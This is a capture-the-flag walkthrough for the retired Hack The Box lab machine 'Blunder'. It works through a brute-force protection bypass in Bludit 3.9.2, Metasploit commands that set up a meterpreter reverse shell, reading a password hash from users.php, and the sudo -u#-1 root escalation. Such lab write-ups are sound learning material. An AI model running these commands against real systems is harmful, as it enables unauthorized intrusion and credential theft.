HTB Walkthrough: Blunder (retired)

Blunder is a retired box on HTB.

Hostname: Blunder | Difficulty Level: Easy | Operating System: Linux

We can see Port 80 is open.

Running gobuster to enumerate pages on the webserver:

When you browse to http://10.10.10.191/admin, you can see a web portal. Above wordlist we used was for directory listing. Let us use wordlist for web page listing which can be found here.

In gobuster tool, ‘-b 403,404' option is used to skip the HTTP status 403,404. Make sure to mention all status of 4XX applicable to your search or it will throw an error. From gobuster, there were two interesting files:

install.php: It reveals text “Bludit is already installed ;)”.

todo.txt file reveals above

todo.txt hints ‘fergus’ as one of the user.

If you view the source code for http://10.10.10.191, you will get a hint of Bludit version being 3.9.2

Right-click http://10.10.10.191 > view source code

Searchsploit revealed exploits which require credentials (authenticated exploits). Google search will reveal that Bludit has an exploit (Bludit CMS Version 3.9.2 Brute Force Protection Bypass) to bypass the brute force protection (you can either attempt Hydra or multiple logins to confirm that your IP address is getting blacklisted due to brute force protection).

Referring to this link, it reveals that ‘X-Forwarded-For’ HTTP header can be used to bypass the brute force protection because of it’s (dependency) trust on checking HTTP header value ‘X-Forwarded-For’ for valid IP address. Writing a python script to bypass brute-force protection.

Code is self-explanatory. Please refer ippsec’s video for detailed explanation. Explanation for some blocks of code:

Capture valid session for GET

Fire up burpsuite to understand what should be the parameters for requests.

Your GET request will hit ‘http://10.10.10.191/admin’ (line-3)and it will return web portal page whose source reveals how CSRF token is sent as input.

Source code of http://10.10.10.191/admin

If you observe tokenCSRF value, it is hexadecimal and hence, we use the regex ‘[a-f0–9]*’ (line-4). Cookie value is ‘BLUDIT-KEY’ (line-6)which can be found by sending a GET request and capturing it in burpsuite.

Burpsuite GET request
POST method

After we have received valid session values from init_session() method, we need to POST the form with user and password by bypassing brute-force protection.

Burpsuite POST request by submitting random username/password to http://10.10.10.191/admin

In the bludit.py script, line-23 reflects the values that can be observed in above Burpsuite’s POST request (Burpsuite’s line-14). Observe in Burpsuite that POST request is sent to ‘admin/login’ (Burpsuite’s line-1).

POST method

By trial and error, you will find that the successful login is not status code 200 (line-39). You will get ‘Username or password incorrect’ error for incorrect login (line-42). You will get ‘IP address has been blocked. Try again in few minutes’ error after multiple attempts from same IP address (line-44). You will need to create a dictionary file (words) using ‘cewl’ tool for passwords by crawling ‘http://10.10.10.191’.(line-51)

cewl http://10.10.10.191/ > words

If script is executed, you will get below output:

bludit.py output: Status Code & Credentials

Once you get the credentials from bludit.py, login into ‘http://10.10.10.191/admin/login’.

In order to understand the exploit, use ‘set Proxies’ step and ‘run’ the exploit without setting the payload.

Steps are self-explanatory:

msf5 > search bludit
msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > show options
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set Proxies http:127.0.0.1:8080
msf5 exploit(linux/http/bludit_upload_images_exec) > set ReverseAllowProxy true
msf5 exploit(linux/http/bludit_upload_images_exec) > run

If you keep on forwarding the request in burpsuite (Proxy>Intercept), you will come across below section. Observe the filename (.png file) but the content is PHP code.

Burpsuite

If you click ‘forward’ for the same request in burpsuite (Proxy>Intercept), you will come across below section. You will see that filename is changed to “.htaccess”. Observe ‘AddType application/x-httpd-php .png’, which means execute PNG files as PHP.

Burpsuite

Last request is:

GET /bl-content/tmp/fLkRrBxEGs.png HTTP/1.1

Continuing with Metasploit exploitation. In the previous metasploit session, enter below:

msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.14.37
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

You will get a meterpreter shell.

You will get a hashed password for user ‘hugo’ from below path:

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<hashed-password>

Use ‘hash-identifier’ tool to identify type of hash i.e. SHA1 (exploitable). Use crackstation.net to crack the password for hugo user. Once you have that password, you will get user.txt flag.

Check what you can do with sudo.

hugo@blunder:~$ sudo -l
sudo -l
Password: <hugo-password>

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

hugo@blunder:~$ sudo — version
sudo — version
Sudo version 1.8.25p1

Using below sudo exploit and you will get root shell and root.txt flag.

hugo@blunder:~$ sudo -u#-1 /bin/bash

Security Analyst